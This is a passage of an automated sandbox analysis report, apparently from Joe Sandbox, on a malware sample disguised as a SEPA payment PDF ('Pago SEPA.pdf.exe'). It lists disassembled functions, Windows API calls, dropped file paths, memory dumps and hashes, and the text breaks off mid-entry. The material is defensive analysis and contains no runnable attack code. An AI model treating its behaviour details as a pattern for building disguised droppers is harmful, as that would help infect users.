                                                                      • Opcode ID: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                      • Instruction ID: f0de02ddeea559f0acc09b7c654b6cc4e6647674a776793065cdf7257ef1e696
                                                                      • Opcode Fuzzy Hash: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                      • Instruction Fuzzy Hash: FF01A231948244BFE701ABB0AE5EBDA7F74EB65305F004479F551B62E2C77810008B6E
                                                                      Function 0040493A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                      • wsprintfW.USER32 ref: 004049E4
                                                                      • SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                      • Instruction ID: f455ebafcbecf6c6930287b8ee8bcbe2db44ea01d8d71c40407b913fda14730a
                                                                      • Opcode Fuzzy Hash: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                      • Instruction Fuzzy Hash: D611D87364412867DB10A6BD9C45EAF3288DB85374F250237FA26F61D2DA798C6182D8
                                                                      Function 00402537 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A5C8,000000FF,C:\Users\user\AppData\Roaming\Egetrets105.met,00000400,?,?,00000021), ref: 00402583
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Egetrets105.met,?,?,0040A5C8,000000FF,C:\Users\user\AppData\Roaming\Egetrets105.met,00000400,?,?,00000021), ref: 0040258E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                      • String ID: C:\Users\user\AppData\Roaming\Egetrets105.met
                                                                      • API String ID: 3109718747-3140602148
                                                                      • Opcode ID: 498ed745e776f69b2b4f9c955e66f36e5d976a5f9753c1538237e4ce82c3d7d7
                                                                      • Instruction ID: bfa6d714be92c4527cef4f8895cb5ef110114927b7979418da5827123998f54c
                                                                      • Opcode Fuzzy Hash: 498ed745e776f69b2b4f9c955e66f36e5d976a5f9753c1538237e4ce82c3d7d7
                                                                      • Instruction Fuzzy Hash: AE110A72A41204BEDB10AFB58F4AE9E3669AF54394F20403BF402F61C2D6FC8E41466D
                                                                      Function 004059D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059D9
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059E3
                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F5
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-823278215
                                                                      • Opcode ID: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                      • Instruction ID: e27ca5b6c843e4ca6b7b7419ee0e736cc2f4fee1b15a20ddc9c218eb8b1253ea
                                                                      • Opcode Fuzzy Hash: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                      • Instruction Fuzzy Hash: 1DD0A761101930AAC212E7488C00DDF729CAE55345341003BF107B30B1C7781D5287FE
                                                                      Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402D9D
                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,00000000,00403504,?), ref: 00402DE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                      • Instruction ID: e23ac89653febb243e72dcf23735aaa2031a226b5032255065ec6e4c9dbb6a99
                                                                      • Opcode Fuzzy Hash: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                      • Instruction Fuzzy Hash: B3F0F431909220EBC6516B54FD4C9DB7F75FB4571270149B7F001B11E4D7B95C818BAD
                                                                      Function 004050F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00405121
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405172
                                                                        • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
                                                                      • Instruction ID: 7511a9737e1ae187a562f2e55163cfa394ea92b9daba136d2a61478abf79871a
                                                                      • Opcode Fuzzy Hash: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
                                                                      • Instruction Fuzzy Hash: 41015E71A40709BBDF219F11DD84B6B3626E794754F144136FA017E1D1C3BA8C919E2D
                                                                      Function 004037D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037AB,004035C0,?), ref: 004037ED
                                                                      • GlobalFree.KERNEL32(?), ref: 004037F4
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-823278215
                                                                      • Opcode ID: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                      • Instruction ID: 66f8bddb8dfdb1964ca55d912e2b06e4102c5475863404a2afc710826c1672a2
                                                                      • Opcode Fuzzy Hash: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                      • Instruction Fuzzy Hash: CAE0C2B39051206BC7311F04EC08B1AB7BC7F88B32F05416AE8407B3B087742C528BC9
                                                                      Function 00405A1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A25
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A35
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1246513382
                                                                      • Opcode ID: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                      • Instruction ID: 5bbf66532c1e6c52d9ac91e78c5b81189c295a76ad9a8eb5813a93f974e07d29
                                                                      • Opcode Fuzzy Hash: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                      • Instruction Fuzzy Hash: 95D05EB29109209AD322A708DC419AF73ACEF113407464466F401A31A5D3785D818AAA
                                                                      Function 00405B59 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B81
                                                                      • CharNextA.USER32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B92
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                      • Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
                                                                      • Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                      • Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9

                                                                      Executed Functions

                                                                      Function 0484DE58 Relevance: .7, Instructions: 712COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a299af1046af568ed5c7fd74a7736599e01182ca8efdd3500932741e49eaa5a9
                                                                      • Instruction ID: b7b07fcc9822493e5ec4d0c9fc8645926b12c47ac33db8ce2eec00e2ebae1f2e
                                                                      • Opcode Fuzzy Hash: a299af1046af568ed5c7fd74a7736599e01182ca8efdd3500932741e49eaa5a9
                                                                      • Instruction Fuzzy Hash: FC524E34B00219CFDB24DF64D8547ADBBB2BF85308F148A99D84AE7251EB34AD85CF52
                                                                      Function 0479F288 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9ef6ca42f800a6745f2ef67e1954c412257e63b6ae2c46f95cee3f932c7e811
                                                                      • Instruction ID: 23d6405ad6d0582c3344f2020975f0b2b530b3070181aa7c9bbdf9ada4cc0055
                                                                      • Opcode Fuzzy Hash: c9ef6ca42f800a6745f2ef67e1954c412257e63b6ae2c46f95cee3f932c7e811
                                                                      • Instruction Fuzzy Hash: 6821C475604200DFCF05DF54EAC4B26BFA5FB88314F24C5A9E9098A356C33AE856DB61
                                                                      Function 077C4890 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                      • API String ID: 0-1903580985
                                                                      • Opcode ID: 26164e9176dc407a47b1600ce99a86cb43694e8842f6ac7b2e5916f8d05bc487
                                                                      • Instruction ID: 15100207923213f7305977b5fbf44007ccc3630b56672e3fc7992e854d14cf2e
                                                                      • Opcode Fuzzy Hash: 26164e9176dc407a47b1600ce99a86cb43694e8842f6ac7b2e5916f8d05bc487
                                                                      • Instruction Fuzzy Hash: 15928FB4B003148FD728CB68C555BAEBBE2EB89714F21886CD9096F751CB72EC45CB91
                                                                      Function 077C486E Relevance: 13.3, Strings: 10, Instructions: 846COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                      • API String ID: 0-3121157708
                                                                      • Opcode ID: 3db7190b4ea1d5dd20446ffc4505481d98a0df7bea47076cefd383502f85d63a
                                                                      • Instruction ID: 624f11a7690fd918042d5688aa9d43239061612e1759427a8c93535bf372041f
                                                                      • Opcode Fuzzy Hash: 3db7190b4ea1d5dd20446ffc4505481d98a0df7bea47076cefd383502f85d63a
                                                                      • Instruction Fuzzy Hash: 8D72A0B4B003149FD724CB58C551BAEBBB2EB89714F21886DE9096F781CB72EC45CB91
                                                                      Function 077CC914 Relevance: 9.7, Strings: 7, Instructions: 985COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$x.wk$x.wk$-wk
                                                                      • API String ID: 0-1314504004
                                                                      • Opcode ID: 09ec58998f39b7d23c187a474d8328c1639057caa734b61c9e7b321c4bc4b82f
                                                                      • Instruction ID: 7a0083a50fc2b1337f888159a53f597573c3273fe16a6b51297aca089180f557
                                                                      • Opcode Fuzzy Hash: 09ec58998f39b7d23c187a474d8328c1639057caa734b61c9e7b321c4bc4b82f
                                                                      • Instruction Fuzzy Hash: 409292B4B002189FD724DB58CA91BAAB7B2EF89304F5184E8D9095F741CB72ED85CF91
                                                                      Function 077C1148 Relevance: 8.1, Strings: 6, Instructions: 591COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_77c0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q
                                                                      • API String ID: 0-2931719552
                                                                      • Opcode ID: d7873b42ab32e5ccff28e354e991ba4d45a806d597d8bb0ea92c57b0f40ad818
                                                                      • Instruction ID: 7d6e0285553d16f85a1715d64bce93451c21713a715ece9e483e04d2bf95b628
                                                                      • Opcode Fuzzy Hash: d7873b42ab32e5ccff28e354e991ba4d45a806d597d8bb0ea92c57b0f40ad818
                                                                      • Instruction Fuzzy Hash: FA32CFB0B002099FD714CB98C555BAABBE2EF89304F54C86DE9059F792CB72DC45CB91
                                                                      Function 077C0840 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2594746569.00000000077C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077C0000, based on PE: false
